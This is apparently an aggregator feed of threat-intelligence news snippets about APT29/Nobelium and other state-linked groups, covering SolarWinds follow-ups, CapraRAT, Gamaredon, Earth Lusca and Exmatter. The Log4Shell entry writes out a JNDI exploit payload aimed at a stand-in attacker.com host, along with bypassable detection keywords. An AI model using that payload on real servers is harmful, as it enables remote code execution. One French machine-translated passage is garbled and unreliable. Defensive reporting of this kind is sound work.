we are aware of at this time. Was the Certificate Stolen?Unknown at this time. As this is a breaking news event, information is sparse. Why is the Malware Signed?Malware is often signed by threat actors as a pretence to evade AV or any other security software. Signed malware allows for threat actors to evade and effectively bypass detection and guaranteeing a higher success rate. What is the Status of Coverage?FortiGuard Labs has AV coverage in place for publicly available samples as:W32/KillDisk.NCV!tr Malware Threat APT 29
The_Hackers_News.webp 2022-02-09 02:46:33 Russian APT Hackers Used COVID-19 Lures to Target European Diplomats (lien direct) The Russia-linked threat actor known as APT29 targeted European diplomatic missions and Ministries of Foreign Affairs as part of a series of spear-phishing campaigns mounted in October and November 2021. According to ESET's T3 2021 Threat Report shared with The Hacker News, the intrusions paved the way for the deployment of Cobalt Strike Beacon on compromised systems, followed by leveraging the Threat APT 29
Anomali.webp 2022-02-08 16:00:00 Anomali Cyber Watch: Conti Ransomware Attack, Iran-Sponsored APTs, New Android RAT, Russia-Sponsored Gamaredon, and More (lien direct) The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: APT, Cyberespionage, Data breach, RATs, SEO poisoning, and Spearphishing. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity. Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence New CapraRAT Android Malware Targets Indian Government and Military Personnel (published: February 7, 2022) Trend Micro researchers have discovered a new remote access trojan (RAT) dubbed, CapraRAT, that targets Android systems. CapraRAT is attributed to the advanced persistent threat (APT) group, APT36 (Earth Karkaddan, Mythic Leopard, Transparent Tribe), which is believed to be Pakistan-based group that has been active since at least 2016. The Android-targeting CapraRAT shares similarities (capabilities, commands, and function names) to the Windows targeting Crimson RAT, and researchers note that it may be a modified version of the open source AndroRAT. The delivery method of CapraRAT is unknown, however, APT36 is known to use spearphishing emails with attachments or links. Once CapraRAT is installed and executed it will attempt to reach out to a command and control server and subsequently begin stealing various data from an infected device. Analyst Comment: It is important to only use the Google Play Store to obtain your software (for Android users), and avoid installing software from unverified sources because it is easier for malicious applications to get into third-party stores. Applications that ask for additional permissions outside of their normal functionality should be treated with suspicion, and normal functionality for the applications should be reviewed carefully prior to installation. Antivirus applications, if available, should be installed devices. MITRE ATT&CK: [MITRE ATT&CK] Phishing - T1566 | [MITRE ATT&CK] User Execution - T1204 | [MITRE ATT&CK] Software Deployment Tools - T1072 Tags: APT36, Earth Karkaddan, Mythic Leopard, Transparent Tribe, Android, CapraRAT Russia’s Gamaredon aka Primitive Bear APT Group Actively Targeting Ukraine (published: February 3, 2022) The Russia-sponsored, cyberespionage group Primitive Bear (Gamaredon) has continued updating its toolset, according to Unit 42 researchers. The group continues to use their primary tactic in spearphishing emails with attachments that leverage remote templates and template injection with a focus on Ukraine. These email attachments are usually Microsoft Word documents that use the remote template to fetch VBScript, execute it to establish persistence, and wait for the group’s instruction via a command and control server. Unit 42 researchers have analyzed the group’s activity and infrastructure dating back to 2018 up to the current border tensions between Russia and Ukraine. The infrastructure behind the campaigns is robust, with clusters of domains that are rotated and parked on different IPs, often on a daily basis. Analyst Comment: Spearphishing emails represent a significant security risk because the sending email will often appear legitimate to the target; sometimes a target company email is compromis Ransomware Malware Threat Conference APT 35 APT 35 APT 29 APT 29 APT 36 ★★
bleepingcomputer.webp 2022-01-27 09:23:25 Russian APT29 hackers\' stealthy malware undetected for years (lien direct) Hackers associated with the Russian Federation Foreign Intelligence Service (SVR) continued their incursions on networks of multiple organizations after the SolarWinds supply-chain compromise using two recently discovered sophisticated threats. [...] Malware APT 29
CrowdStrike.webp 2022-01-27 08:00:06 Early Bird Catches the Wormhole: Observations from the StellarParticle Campaign (lien direct) StellarParticle is a campaign tracked by CrowdStrike as related to the SUNSPOT implant from the SolarWinds intrusion in December 2020 and associated with COZY BEAR (aka APT29, “The Dukes”).  The StellarParticle campaign has continued against multiple organizations, with COZY BEAR using novel tools and techniques to complete their objectives, as identified by CrowdStrike incident responders […] Solardwinds Solardwinds APT 29 APT 29
Anomali.webp 2022-01-19 22:45:00 Anomali Cyber Watch: Russia-Sponsored Cyber Threats, China-Based Earth Lusca Active in Cyberespionage and Cybertheft, BlueNoroff Hunts Cryptocurrency-Related Businesses, and More (lien direct) The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: APT, China, HTTP Stack, Malspam, North Korea, Phishing, Russia and Vulnerabilities. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity. Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence Earth Lusca Employs Sophisticated Infrastructure, Varied Tools and Techniques (published: January 17, 2022) The Earth Lusca threat group is part of the Winnti cluster. It is one of different Chinese groups that share aspects of their tactics, techniques, and procedures (TTPs) including the use of Winnti malware. Earth Lusca were active throughout 2021 committing both cyberespionage operations against government-connected organizations and financially-motivated intrusions targeting gambling and cryptocurrency-related sectors. For intrusion, the group tries different ways in including: spearphishing, watering hole attacks, and exploiting publicly facing servers. Cobalt Strike is one of the group’s preferred post-exploitation tools. It is followed by the use of the BioPass RAT, the Doraemon backdoor, the FunnySwitch backdoor, ShadowPad, and Winnti. The group employs two separate infrastructure clusters, first one is rented Vultr VPS servers used for command-and-control (C2), second one is compromised web servers used to scan for vulnerabilities, tunnel traffic, and Cobalt Strike C2. Analyst Comment: Earth Lusca often relies on tried-and-true techniques that can be stopped by security best practices, such as avoiding clicking on suspicious email/website links and or reacting on random banners urging to update important public-facing applications. Don’t be tricked to download Adobe Flash update, it was discontinued at the end of December 2020. Administrators should keep their important public-facing applications (such as Microsoft Exchange and Oracle GlassFish Server) updated. MITRE ATT&CK: [MITRE ATT&CK] Drive-by Compromise - T1189 | [MITRE ATT&CK] Exploit Public-Facing Application - T1190 | [MITRE ATT&CK] Phishing - T1566 | [MITRE ATT&CK] Command and Scripting Interpreter - T1059 | [MITRE ATT&CK] Scheduled Task - T1053 | [MITRE ATT&CK] System Services - T1569 | [MITRE ATT&CK] Windows Management Instrumentation - T1047 | [MITRE ATT&CK] Account Manipulation - T1098 | [MITRE ATT&CK] BITS Jobs - T1197 | [MITRE ATT&CK] Create Account - T1136 | [MITRE ATT&CK] Create or Modify System Process - T1543 | [MITRE ATT&CK] External Remote Services - T1133 | [MITRE ATT&CK] Hijack Execution Flow Ransomware Malware Tool Vulnerability Threat Patching Guideline APT 41 APT 38 APT 29 APT 28 APT 28
Anomali.webp 2021-12-15 16:00:00 Anomali Cyber Watch: Apache Log4j Zero-Day Exploit, Google Fighting Glupteba Botnet, Vixen Panda Targets Latin America and Europe, and More (lien direct) The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: Apache, Botnets, China, Espionage, Java, Russia, USB, and Vulnerabilities. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity. Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence Countless Servers Are Vulnerable to Apache Log4j Zero-Day Exploit (published: December 10, 2021) A critical vulnerability, registered as CVE-2021-44228, has been identified in Apache Log4j 2, which is an open source Java package used to enable logging in. The Apache Software Foundation (ASF) rates the vulnerability as a 10 on the common vulnerability scoring system (CVSS) scale. Cisco Talos has observed malicious activity related to CVE-2021-44228 beginning on December 2, 2021. This vulnerability affects millions of users and exploitation proof-of-concept code exists via LunaSec explains how to exploit it in five simple steps. These include: 1: Data from the User gets sent to the server (via any protocol). 2: The server logs the data in the request, containing the malicious payload: ${jndi:ldap://attacker.com/a} (where attacker.com is an attacker controlled server). 3: The Log4j vulnerability is triggered by this payload and the server makes a request to attacker.com via "Java Naming and Directory Interface" (JNDI). 4: This response contains a path to a remote Java class file (ex. http://second-stage.attacker.com/Exploit.class) which is injected into the server process. 5: This injected payload triggers a second stage, and allows an attacker to execute arbitrary code. Analyst Comment: Log4j version 2.15.0 has been released to address this vulnerability, however, it only changes a default setting (log4j2.formatMsgNoLookups) from false to true. This means that if the setting is set back to false, Log4j will again be vulnerable to exploitation. The initial campaigns could have been detected by filtering on certain keywords such as "ldap", "jndi", but this detection method is easily bypassable. MITRE ATT&CK: [MITRE ATT&CK] Exploit Public-Facing Application - T1190 | [MITRE ATT&CK] Exploitation for Client Execution - T1203 | [MITRE ATT&CK] Command and Scripting Interpreter - T1059 | [MITRE ATT&CK] Remote Services - T1021 | [MITRE ATT&CK] OS Credential Dumping - T1003 | [MITRE ATT&CK] Resource Hijacking - T1496 | [MITRE ATT&CK] Network Denial of Service - T1498 Tags: Log4j, CVE-2021-44228, Log4j2, Log4Shell, Apache, Zero-day, Java, Jndi, Class file Over a Dozen Malicious NPM Packages Caught Hijacking Discord Servers (published: December 8, 2021) Researchers from the DevOps firm JFrog has found at least 17 malicious packages on the open source npm Registry for JavaScript. The names of the packages are: prerequests-xcode (version 1.0.4), discord-selfbot-v14 (version 12.0.3), discord-lofy (version 11.5.1), discordsystem (version 11.5.1), discord-vilao (version 1.0.0), fix-error (version 1 Malware Tool Vulnerability Threat Cloud APT 37 APT 29 APT 15 APT 15 APT 25
SecurityAffairs.webp 2021-12-07 07:54:37 Nobelium continues to target organizations worldwide with custom malware (lien direct) Russia-linked Nobelium APT group is using a new custom malware dubbed Ceeloader in attacks against organizations worldwide. Mandiant researchers have identified two distinct clusters of activity, tracked UNC3004 and UNC2652, that were associated with the Russia-linked Nobelium APT group (aka UNC2452). The NOBELIUM APT (APT29, Cozy Bear, and The Dukes) is the threat actor that conducted […] Malware Threat APT 29
SecurityAffairs.webp 2021-12-06 22:31:02 Nobelium APT targets French orgs, French ANSSI agency warns (lien direct) The French cyber-security agency ANSSI said that the Russia-linked Nobelium APT group has been targeting French organizations since February 2021. The French national cybersecurity agency ANSSI (Agence Nationale de la Sécurité des Systèmes d’Information) revealed that the Russia-linked Nobelium APT group has been targeting French organizations since February 2021. The NOBELIUM APT (APT29, Cozy Bear, and […] APT 29
Mandiant.webp 2021-12-06 10:00:00 Activité russe présumée ciblant le gouvernement et les entités commerciales du monde entier
Suspected Russian Activity Targeting Government and Business Entities Around the Globe
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Mise à jour (mai 2022): Nous avons fusionné unc2452 avec apt29 .L'activité UNC2452 décrite dans ce post est désormais attribuée à APT29. comme anniversaire d'un an de la découverte du Chaîne d'approvisionnement Solarwinds Passe de compromis, mandiant reste engagé à être engagé à être engagé à être engagé à engagerSuivre l'un des acteurs les plus difficiles que nous ayons rencontrés.Ces acteurs russes présumés pratiquent la sécurité opérationnelle de premier ordre et les métiers avancés.Cependant, ils sont faillibles et nous continuons à découvrir leur activité et à apprendre de leurs erreurs.En fin de compte, ils restent une menace adaptable et évolutive qui doit être étroitement étudiée par
UPDATE (May 2022): We have merged UNC2452 with APT29. The UNC2452 activity described in this post is now attributed to APT29. As the one-year anniversary of the discovery of the SolarWinds supply chain compromise passes, Mandiant remains committed to tracking one of the toughest actors we have encountered. These suspected Russian actors practice top-notch operational security and advanced tradecraft. However, they are fallible, and we continue to uncover their activity and learn from their mistakes. Ultimately, they remain an adaptable and evolving threat that must be closely studied by
Threat Solardwinds APT 29 ★★★
Anomali.webp 2021-11-02 15:00:00 Anomali Cyber Watch: Russian Intelligence Targets IT Providers, Malspam Abuses Squid Games, Another npm Library Compromise, and More (lien direct) The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: Data leak, Critical services, Money laundering, Phishing, Ransomware, and Supply-chain. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity. Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence BlackMatter: New Data Exfiltration Tool Used in Attacks (published: November 1, 2021) Symantec researchers have discovered a custom data exfiltration tool, dubbed Exmatter, being used by the BlackMatter ransomware group. The same group has also been responsible for the Darkside ransomware - the variant that led to the May 2021 Colonial Pipeline outage. Exmatter is compiled as a .NET executable and obfuscated. This tool is designed to steal sensitive data and upload it to an attacker-controlled server prior to deployment of the ransomware as fast as possible. The speed is achieved via multiple filtering mechanisms: directory exclusion list, filetype whitelist, excluding files under 1,024 bytes, excluding files with certain attributes, and filename string exclusion list. Exmatter is being actively developed as three newer versions were found in the wild. Analyst Comment: Exmatter exfiltration tool by BlackMatter is following two custom data exfiltration tools linked to the LockBit ransomware operation. Attackers try to narrow down data sources to only those deemed most profitable or business-critical to speed up the whole exfiltration process. It makes it even more crucial for defenders to be prepared to quickly stop any detected exfiltration operation. MITRE ATT&CK: [MITRE ATT&CK] File and Directory Discovery - T1083 | [MITRE ATT&CK] Obfuscated Files or Information - T1027 | [MITRE ATT&CK] Data Encrypted for Impact - T1486 | [MITRE ATT&CK] Exfiltration Over Alternative Protocol - T1048 Tags: Exmatter, BlackMatter, Darkside, Ransomware, Exfiltration, Data loss prevention Iran Says Israel, U.S. Likely Behind Cyberattack on Gas Stations (published: October 31, 2021) Iranian General Gholamreza Jalali, head of Iran’s passive defense organization, went to state-run television to blame Israel and the U.S. for an October 26, 2021 cyberattack that paralyzed gasoline stations across the country. The attack on the fuel distribution chain in Iran forced the shutdown of a network of filling stations. The incident disabled government-issued electronic cards providing subsidies that tens of millions of Iranians use to purchase fuel at discounted prices. Jalali said the attack bore similarities to cyber strikes on Iran’s rail network and the Shahid Rajaee port. The latest attack displayed a message reading "cyberattack 64411" on gas pumps when people tried to use their subsidy cards. Similarly, in July 2021, attackers targeting Iranian railroad prompted victims to call 64411, the phone number for the office of Supreme Leader Ali Khamenei. Analyst Comment: Iran has not provided evidence behind the attribution, so Ransomware Malware Tool Threat Guideline APT 29 APT 29
SecurityAffairs.webp 2021-10-25 11:41:33 Russia-linked Nobelium APT targets orgs in the global IT supply chain (lien direct) Russia-linked Nobelium APT group has breached at least 14 managed service providers (MSPs) and cloud service providers since May 2021. The SolarWinds security breach was not isolated, Russia-linked Nobelium APT group has targeted140 managed service providers (MSPs) and cloud service providers and successfully breached 14 of them since May 2021. The NOBELIUM APT (APT29, Cozy Bear, and […] APT 29
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